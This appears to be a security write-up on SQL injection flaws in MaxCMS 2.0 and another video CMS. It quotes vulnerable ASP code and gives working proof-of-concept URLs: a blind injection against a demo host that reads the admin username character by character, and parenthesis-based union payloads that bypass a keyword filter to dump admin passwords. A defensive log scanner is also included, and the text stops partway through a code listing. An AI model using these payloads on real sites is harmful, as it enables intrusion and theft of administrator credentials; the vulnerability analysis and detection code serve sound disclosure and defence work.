This system is a very popular on-demand Video-on-Demand System in China. The previous version 1.5 has many vulnerabilities. Version 2.0 has improved its security, but there are still vulnerabilities.
View the code in inc/ajax.asp:

    Dim action: action = getForm("action", "get")
    Response.CharSet = "gbk"

    Select Case action
        Case "newslist": viewNewsList
        Case "newscontent": viewNewsContent
        Case "digg", "tread": scoreVideo(action)
        Case "reporterr": reportErr
        Case "hit": updateHit
        Case Else: main
    End Select
    TerminateAllObjects

    ......

    Sub scoreVideo(operType)
        Dim sql, id, digg, returnValue: id = getForm("id", "get")
        ' the id value is read from the GET parameter
        If rCookie("maxcms2_score" & id) = "OK" Then die "havescore"
        If isNul(id) Then die "err"
        'On Error Resume Next
        digg = conn.db("select m_digg from {pre}data where m_id=" & id, "execute")(0)
        ' the id parameter is concatenated into the SQL statement without any filtering
        If err Then digg = 0: err.Clear()
        If Not isNum(id) Then echoSaveStr "safe" Else id = cLng(id)
        ' digg has already been queried by this point; pay attention to the returned content
        ......
Exploitation is straightforward: append a condition to the id parameter (the default admin table is m_manager, with the columns m_username and m_pwd) and read the answer off the response.
If the constructed statement is correct, the page returns a warning similar to "the data you submitted contains invalid characters; your IP address xxxx has been recorded".
If the constructed statement is incorrect, the server returns a 500.
PoC:
Correct:
- http://demo.maxcms.net/inc/ajax.asp?action=digg&id=1%20and%20(select%20top%201%20asc(mid(m_username,1,1))%20from%20m_manager)=97
Incorrect:
- http://demo.maxcms.net/inc/ajax.asp?action=digg&id=1%20and%20(select%20top%201%20asc(mid(m_username,1,1))%20from%20m_manager)=99
In practice, just point an injection tool at it.
I only skimmed this system at the time and did not keep the relevant code, so I will just leave two injection statements; the injection may no longer exist.
This one is embarrassingly simple: SQL detection and filtering is keyword-based, but many important keywords are expected to be followed by a space, so parentheses can be used in place of the spaces to bypass the filter.
- http://localhost/play.asp?id=-999+union(select(password),2,3,4,5,6,7,8,9,0,1+from+[zt_admin])
- http://localhost/play.asp?id=-999+union(select(adminname),2,3,4,5,6,7,8,9,0,1+from+[zt_admin])
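To illustrate the two points made above, the blind injection through the digg/tread id parameter and the parenthesis bypass of a space-anchored keyword filter, here is an added defender-side example that is not part of the original write-up: an id validator of the kind scoreVideo should apply before running any query, and a log scanner whose keyword match uses word boundaries rather than a trailing space. The log lines, the keyword list and the "METHOD URL STATUS" line format are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample access log (METHOD URL STATUS), modelled on the PoC URLs above.
SAMPLE_LOG = """\
GET /inc/ajax.asp?action=digg&id=1 200
GET /inc/ajax.asp?action=digg&id=1%20and%20(select%20top%201%20asc(mid(m_username,1,1))%20from%20m_manager)=97 200
GET /inc/ajax.asp?action=tread&id=1%20and%20(select%20top%201%20asc(mid(m_username,1,1))%20from%20m_manager)=99 500
GET /play.asp?id=-999+union(select(password),2,3,4,5,6,7,8,9,0,1+from+[zt_admin]) 200
GET /play.asp?id=42 200
"""

# Assumed keyword list. Matching on \b (word boundary) instead of "keyword "
# is what closes the "union(select(" gap: "(" is a boundary, a space is not required.
SQL_KEYWORDS = ("union", "select", "from", "and", "or", "mid", "asc")
KEYWORD_RE = re.compile(r"\b(" + "|".join(SQL_KEYWORDS) + r")\b", re.IGNORECASE)


def id_is_valid(value):
    """The check scoreVideo should make before touching the database: digits only."""
    return value is not None and re.fullmatch(r"\d+", value) is not None


def classify_request(query):
    """Return the reasons a query string looks like an injection attempt (empty list = clean)."""
    params = {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}
    reasons = []
    raw_id = params.get("id")
    if raw_id is not None and not id_is_valid(raw_id):
        reasons.append("non-numeric id")
    decoded = unquote_plus(query)
    hits = {m.group(1).lower() for m in KEYWORD_RE.finditer(decoded)}
    if {"select", "from"} <= hits or "union" in hits:
        reasons.append("sql keywords: " + ",".join(sorted(hits)))
    # Parenthesised keyword, the exact shape that a space-anchored filter misses.
    if "(select(" in decoded.lower().replace(" ", ""):
        reasons.append("parenthesised keyword (space-filter bypass)")
    return reasons


def scan_log(text):
    """Parse 'METHOD URL STATUS' lines; return [(path, status, reasons)] for flagged lines."""
    flagged = []
    for line in text.splitlines():
        method, url, status = line.split()
        parts = urlsplit(url)
        reasons = classify_request(parts.query)
        if reasons:
            flagged.append((parts.path, int(status), reasons))
    return flagged
```

Running `scan_log(SAMPLE_LOG)` flags the three injection lines and leaves the two plain numeric requests alone; the 200/500 pairing on the ajax.asp lines is the blind-injection oracle described above.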
Another injection point:

    Sub checkPower
        Dim loginValidate, rsObj: loginValidate = "maxcms2.0"
        err.clear
        On Error Resume Next
        Set rsObj = conn.db("select m_random,m_level from {pre}manager where m_username='" & rCookie("m_username") & "'", "execute")
        loginValidate = md5(getAgent & getIp & rsObj(0))
        If err Then wCookie "check" & rCookie("m_username"), "": die "<script>top.location.href='index.asp?action=login';</script>"
        If rCookie("check" & rCookie("m_username")) <> loginValidate Then wCookie "check" & rCookie("m_username"), "": die "<script>top.location.href='index.asp?action=login';</script>"
        checkManagerLevel rsObj(1)
        Set rsObj = Nothing
    End Sub

where:

    Function rCookie(cookieName)